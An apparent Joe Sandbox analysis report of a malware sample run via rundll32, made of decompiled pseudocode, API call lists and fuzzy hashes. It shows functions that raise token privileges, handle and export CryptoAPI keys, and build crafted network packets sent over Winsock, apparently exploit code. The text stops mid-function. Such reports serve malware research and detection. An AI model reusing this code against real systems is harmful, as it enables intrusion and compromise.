                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                        			E007B7CC5(WCHAR* _a4) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v28;
                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v28.PrivilegeCount = 0;
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				_t24 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) != 0 && LookupPrivilegeValueW(0, _a4,  &(_v28.Privileges)) != 0) {
                                                                                                                                                                                        					_v28.PrivilegeCount = 1;
                                                                                                                                                                                        					_v16 = 2;
                                                                                                                                                                                        					_t24 = AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0, 0);
                                                                                                                                                                                        					_t23 = GetLastError();
                                                                                                                                                                                        					_v12 = _t23;
                                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                                        						_t24 = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				SetLastError(_v12);
                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,007B79E8), ref: 007B7CE9
                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,007B79E8), ref: 007B7CF0
                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007B7D02
                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007B7D25
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 007B7D2D
                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,00000000,?,?,?,007B79E8), ref: 007B7D3F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2365211911-0
                                                                                                                                                                                        • Opcode ID: f9f05ae00a8bb55cbc6e983a6fe384f9e659bd9dca72889af1b1118afc00af72
                                                                                                                                                                                        • Instruction ID: 2f349d498204f5ee39f75b4333620107fd8ac0bcddec6574d39f5e2954dc52b1
                                                                                                                                                                                        • Opcode Fuzzy Hash: f9f05ae00a8bb55cbc6e983a6fe384f9e659bd9dca72889af1b1118afc00af72
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6911FA75A01218BFDB10AFE5DC48AEFBEBCEF48750F104525EA05E2150D6788A45CBA5
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                                                        			E007B559B(intOrPtr _a4) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t25 = __imp__CryptSetKeyParam;
                                                                                                                                                                                        				_v12 = 1;
                                                                                                                                                                                        				 *_t25(_a4, 4,  &_v12, 0);
                                                                                                                                                                                        				_v16 = 1;
                                                                                                                                                                                        				 *_t25(_a4, 3,  &_v16, 0);
                                                                                                                                                                                        				_t19 =  &_v8;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				__imp__CryptGetKeyParam(_a4, 1, 0, _t19, 0);
                                                                                                                                                                                        				if(_t19 != 0 && _v8 != 0) {
                                                                                                                                                                                        					_t19 = LocalAlloc(0x40, _v8);
                                                                                                                                                                                        					_v20 = _t19;
                                                                                                                                                                                        					if(_t19 != 0) {
                                                                                                                                                                                        						 *_t25(_a4, 1, _t19, 0);
                                                                                                                                                                                        						return LocalFree(_v20);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t19;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 007B55BC
                                                                                                                                                                                        • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 007B55CB
                                                                                                                                                                                        • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 007B55DA
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 007B55EE
                                                                                                                                                                                        • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 007B5601
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 007B5606
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CryptParam$Local$AllocFree
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3966954206-0
                                                                                                                                                                                        • Opcode ID: f45828bc66528bb5b8798c835f8c9b86466ad23daa17a795bf232d0e99978e84
                                                                                                                                                                                        • Instruction ID: fde24e0806b6a1fa7ec85fd6d8c298c8a23e6807707d55baf883cd1d0f39a71b
                                                                                                                                                                                        • Opcode Fuzzy Hash: f45828bc66528bb5b8798c835f8c9b86466ad23daa17a795bf232d0e99978e84
                                                                                                                                                                                        • Instruction Fuzzy Hash: C401D3B690021CBFEB21AFD5DC84EEFBF7CEB44654F008466FA05A2150E6748E519BA4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 25%
                                                                                                                                                                                        			E007B56D8(int* __eax, intOrPtr _a4, void* _a8, void** _a12) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                        				int* _t25;
                                                                                                                                                                                        				int _t26;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        				intOrPtr* _t31;
                                                                                                                                                                                        				void** _t33;
                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t25 = __eax;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				if(_a12 != 0 && __eax != 0) {
                                                                                                                                                                                        					_t31 = __imp__CryptEncrypt;
                                                                                                                                                                                        					_v8 = 0xf0;
                                                                                                                                                                                        					 *_t31(_a4, 0, 1, 0, 0,  &_v8, 0, _t30, _t34);
                                                                                                                                                                                        					if(0 != 0) {
                                                                                                                                                                                        						_t20 = LocalAlloc(0x40, _v8);
                                                                                                                                                                                        						_v16 = _t20;
                                                                                                                                                                                        						 *_a12 = _t20;
                                                                                                                                                                                        						if(_t20 != 0) {
                                                                                                                                                                                        							memcpy(_t20, _a8, 0xf0);
                                                                                                                                                                                        							 *_t25 = 0xf0;
                                                                                                                                                                                        							_t22 =  *_t31(_a4, 0, 1, 0, _v16, _t25, _v8);
                                                                                                                                                                                        							_v12 = _t22;
                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                        								_t33 = _a12;
                                                                                                                                                                                        								_t26 =  *_t25;
                                                                                                                                                                                        								_t23 =  *_t33;
                                                                                                                                                                                        								_t29 = _t23;
                                                                                                                                                                                        								while(_t26 != 0) {
                                                                                                                                                                                        									 *_t29 = 0;
                                                                                                                                                                                        									_t29 = _t29 + 1;
                                                                                                                                                                                        									_t26 = _t26 - 1;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								LocalFree(_t23);
                                                                                                                                                                                        								 *_t33 = 0;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v12;
                                                                                                                                                                                        			}

















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 007B5714
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 007B571F
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B5736
                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 007B5750
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007B576E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CryptEncryptLocal$AllocFreememcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 55365748-0
                                                                                                                                                                                        • Opcode ID: 35715f6aa118cb848181ffea6ef303be870e5c857140c56661214a338ec6d7ab
                                                                                                                                                                                        • Instruction ID: 0309b902b589a0499f1e9f8d188f72dee7d380239c6133cd3522324ea02c60f6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 35715f6aa118cb848181ffea6ef303be870e5c857140c56661214a338ec6d7ab
                                                                                                                                                                                        • Instruction Fuzzy Hash: 77215E75A00219FFDB219FA5DC84FEEBFA9EF08750F104165F904E7250E6758A11CBA0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 007B579E
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,?,007B5988,00000000,?,?,?,?,?,?,?,?), ref: 007B57AD
                                                                                                                                                                                        • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 007B57C6
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,007B5988,00000000,?,?,?,?,?,?,?,?), ref: 007B57D6
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4291131564-0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6260
                                                                                                                                                                                        • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6273
                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6289
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CryptHash$CreateDataParam
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3669532303-0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                        			E007B29A2(intOrPtr _a4, void** _a8, short _a12, intOrPtr* _a16) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                        				void* _t160;
                                                                                                                                                                                        				signed int _t166;
                                                                                                                                                                                        				void* _t172;
                                                                                                                                                                                        				intOrPtr _t173;
                                                                                                                                                                                        				short _t174;
                                                                                                                                                                                        				short _t175;
                                                                                                                                                                                        				signed int _t179;
                                                                                                                                                                                        				short _t182;
                                                                                                                                                                                        				signed int _t183;
                                                                                                                                                                                        				signed int _t185;
                                                                                                                                                                                        				intOrPtr _t188;
                                                                                                                                                                                        				short _t189;
                                                                                                                                                                                        				void* _t192;
                                                                                                                                                                                        				void* _t195;
                                                                                                                                                                                        				void* _t204;
                                                                                                                                                                                        				short _t207;
                                                                                                                                                                                        				short _t208;
                                                                                                                                                                                        				short _t209;
                                                                                                                                                                                        				void* _t217;
                                                                                                                                                                                        				short _t223;
                                                                                                                                                                                        				short _t224;
                                                                                                                                                                                        				void* _t226;
                                                                                                                                                                                        				void* _t227;
                                                                                                                                                                                        				void* _t235;
                                                                                                                                                                                        				void* _t240;
                                                                                                                                                                                        				signed int _t241;
                                                                                                                                                                                        				signed int _t246;
                                                                                                                                                                                        				signed int _t247;
                                                                                                                                                                                        				signed int _t252;
                                                                                                                                                                                        				signed int _t254;
                                                                                                                                                                                        				intOrPtr _t261;
                                                                                                                                                                                        				signed int _t262;
                                                                                                                                                                                        				void* _t264;
                                                                                                                                                                                        				signed int _t271;
                                                                                                                                                                                        				void** _t273;
                                                                                                                                                                                        				signed int _t277;
                                                                                                                                                                                        				intOrPtr* _t279;
                                                                                                                                                                                        				intOrPtr _t280;
                                                                                                                                                                                        				void** _t281;
                                                                                                                                                                                        				void* _t285;
                                                                                                                                                                                        				void* _t286;
                                                                                                                                                                                        				void* _t289;
                                                                                                                                                                                        				intOrPtr _t293;
                                                                                                                                                                                        				void* _t297;
                                                                                                                                                                                        				void* _t300;
                                                                                                                                                                                        				void* _t302;
                                                                                                                                                                                        				void* _t304;
                                                                                                                                                                                        				intOrPtr* _t305;
                                                                                                                                                                                        				intOrPtr* _t306;
                                                                                                                                                                                        				void* _t307;
                                                                                                                                                                                        				void* _t308;
                                                                                                                                                                                        				void* _t309;
                                                                                                                                                                                        				void* _t310;
                                                                                                                                                                                        				void* _t313;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v24 = 0xbadf00d;
                                                                                                                                                                                        				_t160 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                                                        				_v8 = _t160;
                                                                                                                                                                                        				if(_t160 == 0) {
                                                                                                                                                                                        					L30:
                                                                                                                                                                                        					return _v24;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t240 = HeapAlloc(GetProcessHeap(), 8, 0x1124);
                                                                                                                                                                                        				if(_t240 == 0) {
                                                                                                                                                                                        					L29:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v8);
                                                                                                                                                                                        					goto L30;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t273 = _a8;
                                                                                                                                                                                        				_t166 = rand();
                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                        				_t241 = 0x14;
                                                                                                                                                                                        				 *((intOrPtr*)( *_t273 + 0x22)) =  *((intOrPtr*)( *_t273 + 0x22)) + _t166 % _t241;
                                                                                                                                                                                        				_t297 =  *_t273;
                                                                                                                                                                                        				_v28 = ( *(_t297 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff;
                                                                                                                                                                                        				_t172 = memcpy(_t240, _t297, 0x100 << 2);
                                                                                                                                                                                        				_t308 = _t307 + 0xc;
                                                                                                                                                                                        				__imp__#9(0x50, 9);
                                                                                                                                                                                        				 *(_t240 + 2) = _t172;
                                                                                                                                                                                        				_t173 = 4;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x28)) = _t173;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x38)) = _t173;
                                                                                                                                                                                        				_t174 = 5;
                                                                                                                                                                                        				 *((short*)(_t240 + 0x49)) = _t174;
                                                                                                                                                                                        				_t175 = 7;
                                                                                                                                                                                        				_t277 = 0;
                                                                                                                                                                                        				 *((short*)(_t240 + 0x4b)) = _t175;
                                                                                                                                                                                        				 *((char*)(_t240 + 8)) = 0xa0;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                                                                                                        				 *(_t240 + 0x2c) = 0x10d0;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x30)) = 0x3f40;
                                                                                                                                                                                        				 *(_t240 + 0x34) = 0x10d0;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                                                                                                        				 *(_t240 + 0x40) = 0;
                                                                                                                                                                                        				 *(_t240 + 0x44) = 0;
                                                                                                                                                                                        				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                                                                                                        				 *((short*)(_t240 + 0x50)) = _a12;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					 *((char*)(_t240 + _t277 + 0x54)) = rand();
                                                                                                                                                                                        					_t277 = _t277 + 1;
                                                                                                                                                                                        				} while (_t277 < 0x10d0);
                                                                                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t179 = rand();
                                                                                                                                                                                        					_t246 = 0x14;
                                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                                        					 *((intOrPtr*)( *_a8 + 0x22)) =  *((intOrPtr*)( *_a8 + 0x22)) + _t179 % _t246;
                                                                                                                                                                                        					_t279 = _a8;
                                                                                                                                                                                        					_t182 =  *((intOrPtr*)( *_t279 + 0x22));
                                                                                                                                                                                        					 *((short*)(_t240 + 0x22)) = _t182;
                                                                                                                                                                                        					__imp__#19(_a4, _t240, 0x54, 0);
                                                                                                                                                                                        					if(_t182 <= 0) {
                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					__imp__#16(_a4, _v8, 0xffff, 0);
                                                                                                                                                                                        					if(_t182 <= 0) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L7:
                                                                                                                                                                                        					_v12 = _v12 + 1;
                                                                                                                                                                                        				} while (_v12 < 4);
                                                                                                                                                                                        				_t280 =  *_t279;
                                                                                                                                                                                        				_t183 = rand();
                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                        				_t247 = 0x14;
                                                                                                                                                                                        				_t185 = _t183 % _t247 +  *(_t280 + 0x22) & 0x0000ffff;
                                                                                                                                                                                        				_v32 = _t185;
                                                                                                                                                                                        				 *(_t280 + 0x22) = _t185;
                                                                                                                                                                                        				__imp__#9(0x1120);
                                                                                                                                                                                        				_t281 = _a8;
                                                                                                                                                                                        				 *(_t240 + 2) = _t185;
                                                                                                                                                                                        				 *((short*)(_t240 + 0x22)) =  *((intOrPtr*)( *_t281 + 0x22));
                                                                                                                                                                                        				_t188 = 4;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x28)) = _t188;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                                                                                                        				 *(_t240 + 0x2c) = 0x10d0;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x38)) = _t188;
                                                                                                                                                                                        				_t189 = 5;
                                                                                                                                                                                        				 *((short*)(_t240 + 0x49)) = _t189;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *_a16 + 0x74)) - 0x10d0;
                                                                                                                                                                                        				 *(_t240 + 0x34) = 0x10d0;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                                                                                                        				 *(_t240 + 0x40) = 0x10d0;
                                                                                                                                                                                        				 *(_t240 + 0x44) = 0x50;
                                                                                                                                                                                        				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                                                                                                        				 *((short*)(_t240 + 0x4b)) = 0x10d7;
                                                                                                                                                                                        				_t192 = HeapAlloc(GetProcessHeap(), 8, 0x160);
                                                                                                                                                                                        				_v20 = _t192;
                                                                                                                                                                                        				if(_t192 == 0) {
                                                                                                                                                                                        					L28:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _t240);
                                                                                                                                                                                        					goto L29;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t252 = 9;
                                                                                                                                                                                        				_t195 = memcpy(_t192,  *_t281, _t252 << 2);
                                                                                                                                                                                        				_t309 = _t308 + 0xc;
                                                                                                                                                                                        				__imp__#9(0x15c);
                                                                                                                                                                                        				_t300 = _v20;
                                                                                                                                                                                        				 *(_t300 + 2) = _t195;
                                                                                                                                                                                        				 *((intOrPtr*)(_t300 + 0x2c)) = 0x114;
                                                                                                                                                                                        				 *((intOrPtr*)(_t300 + 0x3c)) = 0x114;
                                                                                                                                                                                        				 *((char*)(_t300 + 8)) = 0xa1;
                                                                                                                                                                                        				 *((char*)(_t300 + 0x24)) = 0x12;
                                                                                                                                                                                        				 *(_t300 + 0x40) = 0x48;
                                                                                                                                                                                        				 *((short*)(_t300 + 0x49)) = 0x115;
                                                                                                                                                                                        				_t285 = 0;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					 *((char*)(_t300 + _t285 + 0x4c)) = rand();
                                                                                                                                                                                        					_t285 = _t285 + 1;
                                                                                                                                                                                        				} while (_t285 <  *((intOrPtr*)(_t300 + 0x3c)));
                                                                                                                                                                                        				_t286 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                                                                                                        				_v16 = _t286;
                                                                                                                                                                                        				if(_t286 == 0) {
                                                                                                                                                                                        					L27:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _t300);
                                                                                                                                                                                        					goto L28;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t254 = 9;
                                                                                                                                                                                        				_t204 = memcpy(_t286,  *_a8, _t254 << 2);
                                                                                                                                                                                        				_t310 = _t309 + 0xc;
                                                                                                                                                                                        				__imp__#9(0x44);
                                                                                                                                                                                        				_t302 = _v16;
                                                                                                                                                                                        				 *(_t302 + 2) = _t204;
                                                                                                                                                                                        				 *((short*)(_t302 + 0x22)) = _v28;
                                                                                                                                                                                        				 *((short*)(_t302 + 0x25)) = 0x200;
                                                                                                                                                                                        				 *((char*)(_t302 + 8)) = 0x25;
                                                                                                                                                                                        				 *((char*)(_t302 + 0x24)) = 0xe;
                                                                                                                                                                                        				 *(_t302 + 0x31) =  *(_t302 + 0x31) | 0xffffffff;
                                                                                                                                                                                        				_t207 = 4;
                                                                                                                                                                                        				 *((short*)(_t302 + 0x37)) = _t207;
                                                                                                                                                                                        				_t208 = 0x40;
                                                                                                                                                                                        				 *((short*)(_t302 + 0x39)) = _t208;
                                                                                                                                                                                        				_t209 = 5;
                                                                                                                                                                                        				 *((short*)(_t302 + 0x41)) = _t209;
                                                                                                                                                                                        				 *((short*)(_t302 + 0x27)) =  *((intOrPtr*)( *_a16 + 0x7c)) - 0x200;
                                                                                                                                                                                        				 *((short*)(_t302 + 0x44)) = _a12;
                                                                                                                                                                                        				_t289 = HeapAlloc(GetProcessHeap(), 8, 0x1638);
                                                                                                                                                                                        				_v12 = _t289;
                                                                                                                                                                                        				if(_t289 == 0) {
                                                                                                                                                                                        					L26:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _t302);
                                                                                                                                                                                        					_t300 = _v20;
                                                                                                                                                                                        					goto L27;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				memcpy(_t289, _t240, 0x1124);
                                                                                                                                                                                        				_t110 = _t289 + 0x1124; // 0x1124
                                                                                                                                                                                        				_t217 = memcpy(_t110, _v20, 0x160);
                                                                                                                                                                                        				__imp__#9(0x50);
                                                                                                                                                                                        				 *(_t240 + 2) = _t217;
                                                                                                                                                                                        				 *((short*)(_t240 + 0x22)) = _a12;
                                                                                                                                                                                        				_t261 = 4;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x28)) = _t261;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                                                                                                        				 *(_t240 + 0x40) =  *(_t240 + 0x40) & 0x00000000;
                                                                                                                                                                                        				_t271 =  *((intOrPtr*)( *_a16 + 0x74)) - 0x1000;
                                                                                                                                                                                        				 *(_t240 + 0x44) =  *(_t240 + 0x44) & 0x00000000;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x30)) = 0x1000;
                                                                                                                                                                                        				 *(_t240 + 0x34) = _t271;
                                                                                                                                                                                        				_t223 = 5;
                                                                                                                                                                                        				 *((short*)(_t240 + 0x49)) = _t223;
                                                                                                                                                                                        				_t224 = 7;
                                                                                                                                                                                        				 *((short*)(_t240 + 0x4b)) = _t224;
                                                                                                                                                                                        				_t126 = _t289 + 0x1284; // 0x1284
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x38)) = _t261;
                                                                                                                                                                                        				_t262 = 0x15;
                                                                                                                                                                                        				 *(_t240 + 0x2c) = _t271;
                                                                                                                                                                                        				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                                                                                                        				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                                                                                                        				_t226 = memcpy(_t126, _t240, _t262 << 2);
                                                                                                                                                                                        				_t313 = _t310 + 0x24;
                                                                                                                                                                                        				_t132 = _t226 + 0x54; // 0x12d8
                                                                                                                                                                                        				_t304 = _t132;
                                                                                                                                                                                        				_t293 = 0xc;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t227 = _v16;
                                                                                                                                                                                        					 *((short*)(_t227 + 0x22)) =  *((short*)(_t227 + 0x22)) + 1;
                                                                                                                                                                                        					memcpy(_t304, _t227, 0x48);
                                                                                                                                                                                        					_t313 = _t313 + 0xc;
                                                                                                                                                                                        					_t304 = _t304 + 0x48;
                                                                                                                                                                                        					_t293 = _t293 - 1;
                                                                                                                                                                                        				} while (_t293 != 0);
